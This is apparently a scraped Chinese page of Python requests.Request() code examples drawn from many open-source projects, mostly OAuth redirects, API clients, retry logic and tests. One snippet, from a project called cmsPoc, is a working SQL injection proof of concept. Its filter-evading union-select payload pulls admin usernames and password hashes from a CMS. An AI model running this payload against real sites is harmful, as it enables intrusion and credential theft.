Python requests 模块,Request() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用requests.Request()

项目:numerai    作者:gansanay    | 项目源码 | 文件源码
def upload_prediction(self, file_path):
    """Upload a prediction file and register it as a submission.

    The steps run in order and stop at the first one that does not answer
    with HTTP 200: ``self.authorize(file_path)``,
    ``self.get_current_competition()``, a ``PUT`` of the file contents to the
    signed URL, and finally a ``POST`` to ``self._submissions_url``.

    :param file_path: path of the file to upload; it is opened in binary mode.
    :return: the status code of the first step that did not return 200,
        otherwise the status code of the final submission ``POST``.
    """
    filename, signedRequest, headers, status_code = self.authorize(file_path)
    if status_code != 200:
        return status_code

    dataset_id, comp_id, status_code = self.get_current_competition()
    if status_code != 200:
        return status_code

    with open(file_path, 'rb') as fp:
        file_bytes = fp.read()

    prepped = requests.Request('PUT', signedRequest, data=file_bytes).prepare()
    # The session exists only for this single upload; the context manager
    # closes it so its connection pool is released instead of leaked.
    with requests.Session() as s:
        resp = s.send(prepped)
    if resp.status_code != 200:
        return resp.status_code

    r = requests.post(self._submissions_url,
                      data={'competition_id': comp_id,
                            'dataset_id': dataset_id,
                            'filename': filename},
                      headers=headers)

    return r.status_code
项目:zmirror    作者:aploium    | 项目源码 | 文件源码
def extract_url_path_and_query(full_url=None, no_query=False):
    """
    Reduce a full URL to its path, optionally followed by its query string.

    Example: http://foo.bar.com/aaa/p.html?x=y becomes /aaa/p.html?x=y

    :param full_url: URL to reduce; when None, `request.url` is used instead
    :type full_url: str
    :param no_query: when true, the query string is left out of the result
    :return: the path ("/" when the URL has none), followed by "?<query>"
        when a query is present and `no_query` is false
    :rtype: str
    """
    parts = urlsplit(request.url if full_url is None else full_url)
    path = parts.path if parts.path else "/"
    if no_query or not parts.query:
        return path
    return path + '?' + parts.query


# ################# End Client Request Handler #################


# ################# Begin Middle Functions #################
项目:AlexaOPi    作者:dony71    | 项目源码 | 文件源码
def index(self):
    """Send the browser to Amazon's authorization endpoint.

    The redirect URL is ``https://www.amazon.com/ap/oa`` with a query string
    carrying ``Client_ID``, the ``alexa:all`` scope, JSON scope data built
    from ``ProductID`` and a fixed serial number, and a redirect URI formed
    by appending ``code`` to ``cherrypy.url()``.

    :raises cherrypy.HTTPRedirect: always; this is how the redirect is issued.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }
    # prepare() is used purely to URL-encode the query string; no HTTP
    # request is sent from here.
    authorize_url = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare().url
    raise cherrypy.HTTPRedirect(authorize_url)
项目:tap-freshdesk    作者:singer-io    | 项目源码 | 文件源码
def request(url, params=None):
    """Send an authenticated GET and return the response.

    The request uses ``CONFIG['api_key']`` as the basic-auth user name with an
    empty password, and sets ``User-Agent`` from ``CONFIG['user_agent']`` when
    that key is present. Whenever the response carries a ``Retry-After``
    header, the function sleeps for that many seconds and sends the request
    again.

    :param url: URL to fetch.
    :param params: optional query parameters; ``None`` means no parameters.
    :return: the first response that has no ``Retry-After`` header.
    :raises requests.HTTPError: via ``raise_for_status()`` for an error status.
    :raises ValueError: if ``Retry-After`` is not an integer number of seconds.
    """
    params = params or {}
    headers = {}
    if 'user_agent' in CONFIG:
        headers['User-Agent'] = CONFIG['user_agent']

    # Retry in a loop rather than by recursion, so a long run of rate-limit
    # responses cannot exhaust the interpreter's recursion limit.
    while True:
        req = requests.Request('GET', url, params=params, auth=(CONFIG['api_key'], ""), headers=headers).prepare()
        logger.info("GET {}".format(req.url))
        resp = session.send(req)

        if 'Retry-After' not in resp.headers:
            break

        retry_after = int(resp.headers['Retry-After'])
        logger.info("Rate limit reached. Sleeping for {} seconds".format(retry_after))
        time.sleep(retry_after)

    resp.raise_for_status()

    return resp
项目:AlexaPi    作者:alexa-pi    | 项目源码 | 文件源码
def index(self):
    """Redirect the browser to the Amazon authorization page.

    The scope data names the product from ``config['alexa']['Device_Type_ID']``
    and uses the SHA-256 hex digest of ``uuid.getnode()`` as the device serial
    number. The redirect URI is ``cherrypy.url()`` followed by ``code``.

    :raises cherrypy.HTTPRedirect: always, pointing at the prepared URL.
    """
    product_id = config['alexa']['Device_Type_ID']
    serial_number = hashlib.sha256(str(uuid.getnode()).encode()).hexdigest()
    scope_data = json.dumps({
        "alexa:all": {
            "productID": product_id,
            "productInstanceAttributes": {"deviceSerialNumber": serial_number},
        }
    })

    redirect_uri = cherrypy.url() + "code"
    query = {
        "client_id": config['alexa']['Client_ID'],
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": redirect_uri,
    }
    # Only the encoded URL is needed, so the request is prepared but not sent.
    target = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=query).prepare().url
    raise cherrypy.HTTPRedirect(target)
项目:intel-edison-alexa    作者:pedrominatel    | 项目源码 | 文件源码
def index(self):
    """Redirect the caller to the Amazon login/authorization URL.

    Query parameters sent to ``https://www.amazon.com/ap/oa``: ``client_id``
    (``Client_ID``), ``scope`` (``alexa:all``), ``scope_data`` (JSON built from
    ``ProductID`` and serial number ``"001"``), ``response_type`` (``code``)
    and ``redirect_uri`` (``cherrypy.url()`` with ``code`` appended).

    :raises cherrypy.HTTPRedirect: always, carrying the encoded URL.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }
    # The Request object is prepared only to obtain the URL-encoded query
    # string; it is never sent.
    prepared = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare()
    raise cherrypy.HTTPRedirect(prepared.url)
项目:learn_requests    作者:shfanzie    | 项目源码 | 文件源码
def hard_requests():
    """Build a request by hand, print it, send it and print the outcome.

    The prepared request's body and headers are printed before sending. The
    send uses a one-second timeout. On a timeout or an HTTP error status the
    exception's ``message`` is printed; otherwise the status code, reason,
    sent headers and response text are printed.
    """
    from requests import Request, Session
    session = Session()
    prepared = Request(
        'GET',
        build_uri('user/emails'),
        auth=('shfanzie', '**********'),
        headers={'User-Agent': 'fake1.3.4'},
    ).prepare()
    print(prepared.body)
    print(prepared.headers)

    try:
        reply = session.send(prepared, timeout=1)
        reply.raise_for_status()
    except (exceptions.Timeout, exceptions.HTTPError) as err:
        # Both failure kinds are reported the same way.
        print(err.message)
    else:
        print(reply.status_code)
        print(reply.reason)
        print(reply.request.headers)
        print(reply.text)
项目:storj-python-sdk    作者:Storj    | 项目源码 | 文件源码
def _prepare_request(self, **kwargs):
    """Build a prepared HTTP request from keyword arguments.

    Args:
        kwargs (dict): keyword arguments handed first to the authentication
            helper (``_add_ecdsa_signature()`` or ``_add_basic_auth()``) and
            then, with ``path`` replaced by ``url``, to
            :py:class:`requests.Request`.
    Returns:
        The result of calling ``prepare()`` on the constructed request.
    Raises:
        AssertionError: in case ``kwargs['path']`` doesn't start with ``/``.
        KeyError: in case ``path`` is missing from ``kwargs``.
    """

    if 'headers' not in kwargs:
        kwargs['headers'] = {}

    # Authentication runs while ``path`` is still present in kwargs.
    signs_with_key = isinstance(self.private_key, SigningKey)
    if signs_with_key:
        self._add_ecdsa_signature(kwargs)
    elif self.email and self.password:
        self._add_basic_auth(kwargs)

    # Swap the relative path for an absolute URL under the API root.
    relative_path = kwargs.pop('path')
    assert relative_path.startswith('/')
    kwargs['url'] = urljoin(self.api_url, relative_path)

    request = requests.Request(**kwargs)
    return request.prepare()
项目:tap-adwords    作者:singer-io    | 项目源码 | 文件源码
def get_unfiltered_page(sdk_client, fields, start_index, stream):
    """Fetch one page of results for a stream without any filter predicate.

    The service is looked up by the ``service_name`` registered for ``stream``
    in ``GENERIC_ENDPOINT_MAPPINGS``. The selector asks for ``fields`` and for
    ``PAGE_SIZE`` results starting at ``start_index``; both paging values are
    sent as strings. The call is wrapped in ``metrics.http_request_timer``.

    Returns whatever ``attempt_get_from_service`` returns for that selector.
    """
    service_caller = sdk_client.GetService(
        GENERIC_ENDPOINT_MAPPINGS[stream]['service_name'], version=VERSION)
    paging = {
        'startIndex': str(start_index),
        'numberResults': str(PAGE_SIZE),
    }
    selector = {'fields': fields, 'paging': paging}

    with metrics.http_request_timer(stream):
        LOGGER.info("Request %s %s from start_index %s for customer %s",
                    PAGE_SIZE,
                    stream,
                    start_index,
                    sdk_client.client_customer_id)
        return attempt_get_from_service(service_caller, selector)
项目:tap-adwords    作者:singer-io    | 项目源码 | 文件源码
def get_field_list(stream_schema, stream, stream_metadata):
    """Return the field names to request for a stream, in API casing.

    The names come from ``get_fields_to_sync``, are narrowed by
    ``filter_fields_by_stream_name``, and then have their first character
    upper-cased. Each intermediate list is logged at info level.
    """
    # NB> add synthetic keys
    requested = get_fields_to_sync(stream_schema, stream_metadata)
    LOGGER.info("Request fields: %s", requested)

    filtered = filter_fields_by_stream_name(stream, requested)
    LOGGER.info("Filtered fields: %s", filtered)

    # The API expects each field name with its first letter in upper case.
    #
    # See, for instance:
    # https://developers.google.com/adwords/api/docs/reference/v201708/AdGroupAdService.AdGroupAd
    munged = []
    for name in filtered:
        munged.append(name[0].upper() + name[1:])
    LOGGER.info("Munged fields: %s", munged)
    return munged
项目:TCP-IP    作者:JackZ0    | 项目源码 | 文件源码
def request_challenges(self, identifier, new_authzr_uri=None):
    """Ask the server for challenges for an identifier.

    A ``NewAuthorization`` message is posted to ``self.directory.new_authz``.

    :param .messages.Identifier identifier: Identifier to be challenged.
    :param str new_authzr_uri: Deprecated. Do not use. Passing a value only
        produces a debug log entry.

    :returns: Authorization Resource.
    :rtype: `.AuthorizationResource`

    :raises AssertionError: if the response status is not ``CREATED``.

    """
    uri_was_supplied = new_authzr_uri is not None
    if uri_was_supplied:
        logger.debug("request_challenges with new_authzr_uri deprecated.")

    authz_message = messages.NewAuthorization(identifier=identifier)
    response = self.net.post(self.directory.new_authz, authz_message)
    # TODO: handle errors
    assert response.status_code == http_client.CREATED
    return self._authzr_from_response(response, identifier)
项目:TCP-IP    作者:JackZ0    | 项目源码 | 文件源码
def request_domain_challenges(self, domain, new_authzr_uri=None):
    """Request challenges for a domain name.

    Convenience wrapper: the domain is wrapped in a ``messages.Identifier``
    of type ``IDENTIFIER_FQDN`` and handed to ``request_challenges``, which
    holds the full documentation.

    :param str domain: Domain name to be challenged.
    :param str new_authzr_uri: Deprecated. Do not use.

    :returns: Authorization Resource.
    :rtype: `.AuthorizationResource`

    """
    fqdn_identifier = messages.Identifier(
        typ=messages.IDENTIFIER_FQDN, value=domain)
    return self.request_challenges(fqdn_identifier, new_authzr_uri)
项目:AlexaPiDEPRECATED    作者:alexa-pi    | 项目源码 | 文件源码
def index(self):
    """Issue a redirect to the Amazon authorization URL.

    The URL is ``https://www.amazon.com/ap/oa`` plus an encoded query string
    containing ``Client_ID``, scope ``alexa:all``, JSON scope data (product
    ``ProductID``, device serial ``"001"``), response type ``code`` and a
    redirect URI equal to ``cherrypy.url()`` followed by ``code``.

    :raises cherrypy.HTTPRedirect: always; the redirect is delivered this way.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }
    # Preparing the request encodes the query string; nothing is sent.
    redirect_target = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare().url
    raise cherrypy.HTTPRedirect(redirect_target)
项目:AlexaPi    作者:HighTeckMan    | 项目源码 | 文件源码
def index(self):
    """Redirect to Amazon's OAuth authorization page.

    Builds the query for ``https://www.amazon.com/ap/oa`` from ``Client_ID``,
    the ``alexa:all`` scope, JSON-encoded scope data (``ProductID`` and serial
    number ``"001"``), response type ``code``, and a redirect URI made of
    ``cherrypy.url()`` plus ``code``.

    :raises cherrypy.HTTPRedirect: always, with the fully encoded URL.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }
    # The request is prepared, not sent: only its encoded URL is of interest.
    prepared = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare()
    raise cherrypy.HTTPRedirect(prepared.url)
项目:cmsPoc    作者:CHYbeta    | 项目源码 | 文件源码
def poc():
    """Run the check against ``target.url`` and print what it extracts.

    The target URL must end with ``hit.php``; otherwise a hint is printed and
    the interpreter exits. A GET request is prepared from the target URL plus
    a fixed query string, every ``o`` and ``e`` in the prepared URL is
    percent-encoded, and the request is sent. Two ``<br>``-separated values
    are then read from the response text and printed.

    A ``KeyError`` or ``AttributeError`` raised along the way (for example
    when the pattern does not match the response) produces a failure message
    instead of a traceback.
    """
    try:
        if not target.url.endswith("hit.php"):
            print("[*] Please make sure the url end with 'hit.php'")
            exit()
        s = Session()
        payload = "?g=arthit&id=0+uni%6fn+s%65l%65ct+1,1,1,1,1,1,group_concat(id,0x3c62723e,adnaa,0x3c62723e,adpss,0x3c62723e),1,1,1,1,1+fro%6d+axublog_adusers"
        url = target.url + payload
        req = Request('GET', url)
        prepped = s.prepare_request(req)
        # The two replacements apply to the whole prepared URL, in this order.
        prepped.url = prepped.url.replace('o', '%6f')
        prepped.url = prepped.url.replace('e', '%65')
        resp = s.send(prepped)
        # Raw string: same pattern text, without invalid-escape warnings.
        p = re.compile(r"(?<=document.write\(1<br>)(.*)(?=<br>\);)")
        result = re.search(p, resp.text).group(0).split('<br>')
        print("[*] Get the username : " + result[0])
        print("[*] Get the password(encrypted) : " + result[1])
        print("\033[33m[*] Complete this task: {} \033[0m".format(target.url))
    except (KeyError, AttributeError):
        print("\033[31m[!] This poc doesn't seem to work.Please try another one.\033[0m")
项目:Python-Network-Programming-Cookbook-Second-Edition    作者:PacktPublishing    | 项目源码 | 文件源码
def main(address):
    """Submit the same GET request ten times through a throttler.

    The throttler is created with a delay of 1.5. After submission, the
    ``response`` of every throttled request is printed, followed by the
    throttler's success and failure counts.

    :param address: complete URL to request.
    """
    throttler = BaseThrottler(name='base-throttler', delay=1.5)

    # One request object, referenced ten times.
    request = requests.Request(method='GET', url=address)
    batch = [request] * 10

    # The throttler is used as a context manager around the submission.
    with throttler:
        throttled_requests = throttler.submit(batch)

    for throttled in throttled_requests:
        print (throttled.response)

    print ("Success: {s}, Failures: {f}".format(s=throttler.successes,
                                                f=throttler.failures))
项目:kuberdock-platform    作者:cloudlinux    | 项目源码 | 文件源码
def _run(self, act, res, args):
    """Send one request over ``self.conn`` and return the processed result.

    The request is built for the URL from ``self._make_url(res)``, prepared
    by the connection, logged, sent, and the response is logged and handed to
    ``self._return_request``. Warnings are suppressed for the duration.

    :param act: HTTP method.
    :param res: resource passed to ``self._make_url``.
    :param args: mapping of extra keyword arguments for ``requests.Request``.
    :return: the result of ``self._return_request``; on a connection or HTTP
        error, the result of ``self._raise_error``.
    """
    # Bound up front so the HTTPError handler never touches an unbound name.
    response = None
    try:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            url = self._make_url(res)
            request_object = requests.Request(method=act, url=url, **args)
            request_object = self.conn.prepare_request(request_object)
            self.request_logger.log_curl_request(request_object)
            response = self.conn.send(request_object)
            self.request_logger.log_http_response(response)
            return self._return_request(response)
    except requests.exceptions.ConnectionError as e:
        return self._raise_error(str(e))
    except requests.exceptions.HTTPError as e:
        # Prefer the 'data' field of the JSON body; fall back to the exception
        # text when the body is missing or malformed. ``Exception`` instead of
        # a bare ``except`` lets KeyboardInterrupt and SystemExit propagate.
        try:
            detail = response.json()['data']
        except Exception:
            detail = str(e)
        return self._raise_error(detail)
项目:kuberdock-platform    作者:cloudlinux    | 项目源码 | 文件源码
def log_curl_request(self, request):
    """Log a ``curl`` command line equivalent to ``request`` at debug level.

    The command contains the method, one ``-H`` option per header (each pair
    passed through ``self._process_header``), ``-k`` when session
    verification is off or ``--cacert`` when it is a string path,
    ``--cert``/``--key`` from the session's client certificate pair, ``-d``
    with the body when there is one, and finally the quoted URL.

    :param request: object exposing ``method``, ``headers``, ``body``, ``url``.
    """
    self.logger.debug('#################### Request ####################')
    parts = ['curl -i -L -X %s' % request.method]

    parts.extend(
        '-H \'%s: %s\'' % self._process_header(name, content)
        for (name, content) in request.headers.items())

    verify = self.session.verify
    if not verify:
        parts.append('-k')
    elif isinstance(verify, basestring):
        parts.append('--cacert %s' % verify)

    cert = self.session.cert
    if cert:
        parts += ['--cert %s' % cert[0], '--key %s' % cert[1]]

    if request.body:
        parts.append('-d \'%s\'' % request.body)

    parts.append('"%s"' % request.url)
    self.logger.debug(' '.join(parts))
项目:pico    作者:andresriancho    | 项目源码 | 文件源码
def send_with_naive_timing(session, url, token):
    """Send a token-authenticated GET and report how long it took.

    The request is prepared by hand to avoid the auto-added User-Agent and
    Accept headers. It is sent without following redirects and without
    certificate verification.

    TODO: What happens if I want to send data? Do I need to add the
          Content-Type header manually?

    :param session: object whose ``send`` method transmits the request.
    :param url: URL to request.
    :param token: value placed in the ``Authorization: Token ...`` header.
    :return: ``(response, naive_time)`` where ``naive_time`` is the whole of
        ``response.elapsed`` expressed in microseconds.
    """
    req = requests.Request('GET',
                           url,
                           headers={'Authorization': 'Token %s' % token,
                                    'Accept-Encoding': 'identity'}
                           )
    prepared_request = req.prepare()

    response = session.send(prepared_request,
                            allow_redirects=False,
                            verify=False)

    # ``timedelta.microseconds`` is only the sub-second component (0..999999),
    # so on its own it wraps around for responses of one second or longer.
    # Fold days and seconds in to get the full duration.
    elapsed = response.elapsed
    naive_time = ((elapsed.days * 86400 + elapsed.seconds) * 1000000
                  + elapsed.microseconds)

    return response, naive_time
项目:backpack.py    作者:Zwork101    | 项目源码 | 文件源码
def add_listing_alert(self, intent, type, item_raw_name, blanket=1, craftable=True):
    """Send a PUT request that registers a listing alert for an item.

    A URL is built from ``Notifications.ITEM_ALERT``, ``type``, the quoted
    ``item_raw_name``, ``/Tradable/`` and ``Craftable`` or ``Non-Craftable``;
    it is passed to ``Notifications.gen_headers``. The form data carries the
    ``user-id`` cookie, the item name (``type`` and ``item_raw_name`` joined
    by a space), ``intent`` and ``blanket``.

    NOTE(review): the request itself goes to ``Notifications.ITEM_ALERT``, not
    to the URL built here - confirm this is intended.

    :return: the response from ``self._session.send``.
    """
    craft_segment = 'Craftable' if craftable else 'Non-Craftable'
    url = (Notifications.ITEM_ALERT + type + '/' + parse.quote(item_raw_name)
           + '/Tradable/')
    data = {
        "user-id": self.cookies['user-id'],
        "item_name": type + ' ' + item_raw_name,
        "intent": intent,
        "blanket": blanket,
    }
    url += craft_segment

    headers = Notifications.gen_headers('/classifieds/subscriptions', url, 'PUT')
    alert_request = requests.Request(
        'PUT', Notifications.ITEM_ALERT,
        data=data, headers=headers, cookies=self.cookies)
    return self._session.send(alert_request.prepare())
项目:ruffruffs    作者:di    | 项目源码 | 文件源码
def test_prepared_from_session(self, httpbin):
    """Session-level auth must be applied when the session prepares a request.

    The request is created without auth; the session carries an auth object
    that adds a marker header. The header echo from ``httpbin('headers')``
    must contain that marker.
    """
    class DummyAuth(requests.auth.AuthBase):
        # Adds a recognisable header to every request it is applied to.
        def __call__(self, outgoing):
            outgoing.headers['Dummy-Auth-Test'] = 'dummy-auth-test-ok'
            return outgoing

    req = requests.Request('GET', httpbin('headers'))
    assert not req.auth

    session = requests.Session()
    session.auth = DummyAuth()

    resp = session.send(session.prepare_request(req))

    echoed_headers = resp.json()['headers']
    assert echoed_headers['Dummy-Auth-Test'] == 'dummy-auth-test-ok'
项目:ruffruffs    作者:di    | 项目源码 | 文件源码
def test_requests_are_updated_each_time(httpbin):
    """Each redirect hop must be sent with its own, updated request.

    A POST is sent through a ``RedirectSession`` configured with statuses 303
    and 307. The initial call is recorded with no keyword arguments; every
    response produced by ``resolve_redirects`` must carry a GET request and be
    recorded with the default send keyword arguments.
    """
    session = RedirectSession([303, 307])
    prep = requests.Request('POST', httpbin('post')).prepare()

    first = session.send(prep)
    assert first.request.method == 'POST'
    assert session.calls[-1] == SendCall((first.request,), {})

    expected_kwargs = dict(
        stream=False,
        verify=True,
        cert=None,
        timeout=None,
        allow_redirects=False,
        proxies={},
    )
    for response in session.resolve_redirects(first, prep):
        assert response.request.method == 'GET'
        assert session.calls[-1] == SendCall((response.request,),
                                             expected_kwargs)
项目:AlexaBeagleBone2    作者:merdahl    | 项目源码 | 文件源码
def index(self):
    """Redirect the browser to the Amazon authorization URL.

    The query string for ``https://www.amazon.com/ap/oa`` carries
    ``Client_ID``, scope ``alexa:all``, JSON scope data naming ``ProductID``
    with serial number ``"001"``, response type ``code``, and the callback
    URL.

    :raises cherrypy.HTTPRedirect: always, pointing at the encoded URL.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })

    # Establish AMZN callback URL
    callback = cherrypy.url() + "code"

    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }

    # prepare() only encodes the query string; the request is not sent.
    prepared = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare()
    raise cherrypy.HTTPRedirect(prepared.url)
项目:openqa_review    作者:okurz    | 项目源码 | 文件源码
def _get(self, url, as_json=False):  # pragma: no cover
    """Fetch ``url`` with up to six attempts and return its content.

    An attempt is retried after a connection error or an HTTP 502. Any other
    status different from 200 fails immediately.

    :param url: URL to fetch, authenticated with ``self.auth``.
    :param as_json: return the parsed JSON body instead of UTF-8 text.
    :return: parsed JSON when ``as_json`` is true, otherwise the decoded body.
    :raises DownloadError: on a non-200/non-502 status, or when all attempts
        were used up.
    """
    # Status of the most recent response, if any attempt got that far. Kept
    # separately because the response name is never bound when every attempt
    # ends in a connection error.
    last_status = None
    for i in range(1, 7):
        try:
            r = requests.get(url, auth=self.auth)
        except requests.exceptions.ConnectionError:
            log.info("Connection error encountered accessing %s, retrying try %s" % (url, i))
            continue
        last_status = r.status_code
        if r.status_code == 502:
            log.info("Request to %s failed with status code 502, retrying try %s" % (url, i))
            continue
        if r.status_code != 200:
            msg = "Request to %s was not successful, status code: %s" % (url, r.status_code)
            log.info(msg)
            raise DownloadError(msg)
        break
    else:
        msg = "Request to %s was not successful after multiple retries, giving up. Status code: %s" % (url, last_status)
        log.warn(msg)
        raise DownloadError(msg)
    content = r.json() if as_json else r.content.decode('utf8')
    return content
项目:AlexaPi    作者:kgpayne    | 项目源码 | 文件源码
def index(self):
    """Redirect to the Amazon authorization endpoint.

    The target is ``https://www.amazon.com/ap/oa`` with these query
    parameters: ``client_id`` from ``Client_ID``, ``scope`` set to
    ``alexa:all``, ``scope_data`` as JSON (``ProductID``, serial ``"001"``),
    ``response_type`` set to ``code``, and ``redirect_uri`` set to
    ``cherrypy.url()`` plus ``code``.

    :raises cherrypy.HTTPRedirect: always.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {
        "client_id": Client_ID,
        "scope": "alexa:all",
        "scope_data": scope_data,
        "response_type": "code",
        "redirect_uri": callback,
    }
    # Nothing is sent here; preparing the request yields the encoded URL.
    encoded_url = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare().url
    raise cherrypy.HTTPRedirect(encoded_url)
项目:NintendoClients    作者:Kinnay    | 项目源码 | 文件源码
def login(self, username, password, hash=False):
    """Request an access token with the password grant and store it.

    Sends ``grant_type``, ``user_id`` and ``password`` to
    ``oauth20/access_token/generate``; ``password_type`` is added with the
    value ``hash`` when ``hash`` is true. On return, ``self.access_token``,
    ``self.refresh_token`` and ``self.refresh_time`` (current time plus the
    ``expires_in`` value from the response) are set.
    """
    form = {
        "grant_type": "password",
        "user_id": username,
        "password": password,
    }
    if hash:
        form["password_type"] = "hash"

    response = Request(self).get("oauth20/access_token/generate", data=form)

    self.access_token = response.oauth20.access_token.token.text
    self.refresh_token = response.oauth20.access_token.refresh_token.text
    now = time.time()
    self.refresh_time = now + int(response.oauth20.access_token.expires_in.text)
项目:certbot    作者:nikoloskii    | 项目源码 | 文件源码
def request_challenges(self, identifier, new_authzr_uri=None):
    """Ask the server for challenges for an identifier.

    :param .messages.Identifier identifier: Identifier to be challenged.
    :param str new_authzr_uri: ``new-authorization`` URI. If omitted,
        will default to value found in ``directory``.

    :returns: Authorization Resource.
    :rtype: `.AuthorizationResource`

    :raises AssertionError: if the response status is not ``CREATED``.

    """
    authz_message = messages.NewAuthorization(identifier=identifier)

    if new_authzr_uri is None:
        target_uri = self.directory.new_authz
    else:
        target_uri = new_authzr_uri

    response = self.net.post(target_uri, authz_message)
    # TODO: handle errors
    assert response.status_code == http_client.CREATED
    return self._authzr_from_response(response, identifier)
项目:certbot    作者:nikoloskii    | 项目源码 | 文件源码
def request_domain_challenges(self, domain, new_authzr_uri=None):
    """Request challenges for a domain name.

    Convenience wrapper: the domain is wrapped in a ``messages.Identifier``
    of type ``IDENTIFIER_FQDN`` and handed to ``request_challenges``, which
    holds the full documentation.

    :param str domain: Domain name to be challenged.
    :param str new_authzr_uri: forwarded unchanged to ``request_challenges``.

    :returns: Authorization Resource.
    :rtype: `.AuthorizationResource`

    """
    fqdn_identifier = messages.Identifier(
        typ=messages.IDENTIFIER_FQDN, value=domain)
    return self.request_challenges(fqdn_identifier, new_authzr_uri)
项目:lti    作者:pylti    | 项目源码 | 文件源码
def generate_launch_request(self, **kwargs):
    """
    Build the launch request as a POST to ``self.launch_url`` and return the
    result of applying an ``OAuth1`` body-type signer to the prepared request.

    Extra keyword arguments are forwarded to the ``OAuth1`` constructor.
    Raises ``InvalidLTIConfigError`` when ``has_required_params()`` is false.
    """
    if not self.has_required_params():
        message = ("Consumer's launch params missing one of "
                   + str(LAUNCH_PARAMS_REQUIRED))
        raise InvalidLTIConfigError(message)

    launch_params = self.to_params()
    prepared = Request('POST', self.launch_url, data=launch_params).prepare()
    signer = OAuth1(
        self.consumer_key,
        self.consumer_secret,
        signature_type=SIGNATURE_TYPE_BODY,
        **kwargs
    )
    return signer(prepared)
项目:talk-network-retries    作者:marchukov    | 项目源码 | 文件源码
def get_retry_extended():
    """Fetch ``URL`` as JSON, retrying on connection errors as well.

    A ``Retry`` policy is mounted on a fresh session for every attempt. When
    the send still fails with ``ConnectionError``, the policy is advanced
    with ``increment()``, its backoff sleep is run, a warning is logged and
    the attempt is repeated with the new policy object.
    """
    initial_retry = urllib3.util.Retry(
        total=MAX_RETRIES,
        connect=MAX_RETRIES,
        read=MAX_RETRIES,
        backoff_factor=BACKOFF_FACTOR)

    def attempt(url, retry=initial_retry):
        try:
            # this essentially creates a new connection pool per request :-(
            session = requests.Session()
            session.mount(
                RETRY_PREFIX,
                requests.adapters.HTTPAdapter(max_retries=retry))
            req = requests.Request('GET', url).prepare()
            # would be nice just to pass retry here, but we cannot :-(
            r = session.send(req, timeout=TIMEOUT)
            r.raise_for_status()
        except ConnectionError as e:
            # increment() will return a new Retry() object; anything it
            # raises is not handled here and reaches the caller.
            retry = retry.increment(req.method, url, error=e)
            retry.sleep()
            logging.warning("Retrying (%r) after connection broken by '%r': '%s'", retry, e, url)
            return attempt(url, retry=retry)
        else:
            return r

    return attempt(URL).json()
项目:talk-network-retries    作者:marchukov    | 项目源码 | 文件源码
def get_content_aware():
    """Fetch ``URL`` and return its decoded JSON, retrying on bad content too.

    Each attempt mounts the ``Retry`` policy on a fresh session, sends a GET,
    checks the status and decodes the body. A ``ConnectionError`` or
    ``TypeError`` advances the policy with ``increment()``, runs its backoff
    sleep, logs a warning and repeats the attempt.
    """
    initial_retry = urllib3.util.Retry(total=MAX_RETRIES,
                                       connect=MAX_RETRIES,
                                       read=MAX_RETRIES,
                                       backoff_factor=BACKOFF_FACTOR)

    def attempt(url, retry=initial_retry):
        try:
            session = requests.Session()
            session.mount(
                RETRY_PREFIX,
                requests.adapters.HTTPAdapter(max_retries=retry))
            req = requests.Request('GET', url).prepare()
            r = session.send(req, timeout=TIMEOUT)
            r.raise_for_status()
            j = r.json()
        # DEMO ONLY. TypeError is too wide to handle here
        except (ConnectionError, TypeError) as e:
            retry = retry.increment(req.method, url, error=e)
            retry.sleep()
            logging.warning("Retrying (%r) after connection broken by '%r': '%s'", retry, e, url)
            return attempt(url, retry=retry)
        else:
            return j

    return attempt(URL)
项目:qingstor-sdk-python    作者:yunify    | 项目源码 | 文件源码
def parse(self):
    """Build a ``Req`` from this operation's method, URI, body and headers.

    The method is read from ``self.operation["Method"]``. The URI, body and
    headers come from ``parse_request_uri()``, ``parse_request_body()`` (first
    element of its result) and ``parse_request_headers()``, called in that
    order. The parsed URI is logged at debug level.

    :return: ``Req(method, uri, data=body, headers=headers)``.
    """
    # Plain locals replace a dict that was filled in here but never read.
    method = self.operation["Method"]
    uri = self.parse_request_uri()
    self.logger.debug("parsed_uri: %s" % uri)
    parsed_body, _ = self.parse_request_body()
    parsed_headers = self.parse_request_headers()
    return Req(
        method,
        uri,
        data=parsed_body,
        headers=parsed_headers
    )
